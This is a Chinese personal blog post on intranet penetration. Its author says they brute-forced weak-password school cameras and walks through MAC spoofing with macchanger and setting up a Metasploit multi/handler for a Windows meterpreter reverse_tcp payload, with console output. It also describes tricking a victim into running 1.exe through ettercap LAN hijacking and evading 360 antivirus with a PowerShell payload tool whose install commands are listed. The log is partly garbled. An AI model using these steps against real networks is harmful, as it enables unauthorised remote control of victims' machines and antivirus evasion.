内网漫游篇

这几天爆破了学校弱口令摄像头,对内网渗透非常感兴趣,加上自己许久没有玩过kali linux,所以这几天好好研究下内网渗透。

写下这篇博客记录有趣的内网漫游。

0x01基本操作:

root@kali:~# ifconfig eth0 down            //关闭网络(这样才能更换mac地址)

root@kali:~# macchanger -m 00:0g:15:f5:7a:9c eth0
Current MAC:   00:0c:29:1c:8c:ea (VMware, Inc.)
Permanent MAC: 00:0c:29:1c:8c:ea (VMware, Inc.)

New MAC:       00:00:15:f5:7a:9c (DATAPOINT CORPORATION)

tip:

MAC地址永久生效:
Kail Linux基于Debian,而Debian的所有网络接口配置都位于/etc/network/interfaces文件中。
编辑/etc/network/interfaces:
1 # vim /etc/network/interfaces
添加一行脚本:
1 pre-up ifconfig wlan0 hw ether 00:00:00:00:00:11
如果你想恢复初始mac地址,只要注释掉这一行就可以了。

计算机名称定义

计算机采用“区域名(+物理位置)+单位名(+组名)+IP地址的主机号(后三位)”的组成方法。例如,属于C区域位于18号楼的文档管理部的一台10.10.20.10/24的主机可以命名为C18-DM-010。网络设备需符合Cisco网络设备命名规范。


msfconsole数据库postgresql

kali 2.0 已经没有metasploit 这个服务了,所以service metasploit start 的方式不起作用。
在kali 2.0中启动带数据库支持的MSF方式如下:
#1  首先启动postgresql数据库:/etc/init.d/postgresql start;或者 service postgresql start;
#2  初始化MSF数据库(关键步骤!):msfdb init;
#3  运行msfconsole:msfconsole;
#4  在msf中查看数据库连接状态:db_status。
DONE


0x02正篇开始:

内网漫游篇_第1张图片

msf exploit(multi/handler) > msf exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
[-] Unknown command: msf.
msf exploit(multi/handler) > PAYLOAD => windows/x64/meterpreter/reverse_tcp
[-] Unknown command: PAYLOAD.
msf exploit(multi/handler) > set LHOST 192.168.164.128
LHOST => 192.168.164.128
msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.164.128:4444 
内网漫游篇_第2张图片

受害者打开1.exe即被控制

然后你就可以随心所欲做你想做的事啦,但是问题来了

如何让受害者乖乖打开1.exe呢

这里就要讲到内网劫持了,这里使用的软件是ettercap,在我前面的博客我也要介绍过

内网漫游篇_第3张图片

内网漫游篇_第4张图片


在这里我没有演示的原因是因为,我只有一台电脑是网线连接的。我开的虚拟机是桥接,使用ettercap根本就检测不到我的主机。

这里的步骤我画图演示下

内网漫游篇_第5张图片

内网漫游篇_第6张图片但是问题又来了,对方有360我们该如何免杀呢

内网漫游篇_第7张图片

这里就介绍到了powershell这个东西了

这里我们利用到demonsec666/secist_script

安装和使用(Installation && Usage):

  • git clone https://github.com/demonsec666/secist_script.git

  • cd secist_script

  • sudo chmod -R 777

  • ./setup.sh

  • ./secist_script.sh

  • ./secist_script.sh

作者(About Us)
即刻安全(Secist Sec) 
----> Demon
个人博客(Personal Blog) 
---->www.ggsec.cn
英文翻译(English translator) 
---->KIM
团队博客(Team Blog) 
---->www.secist.com
Metasploit 系列教程(Metaploit Tutorial) 
---->网盘(URL): https://pan.baidu.com/s/1kWblUaN
Metasploit 系列教程 第八课(Metaploit Tutorial 8) 
---->www.ggsec.cn/MSF8-0.html

内网漫游篇_第8张图片



metasploit命令参考

你可能感兴趣的:(安全技术)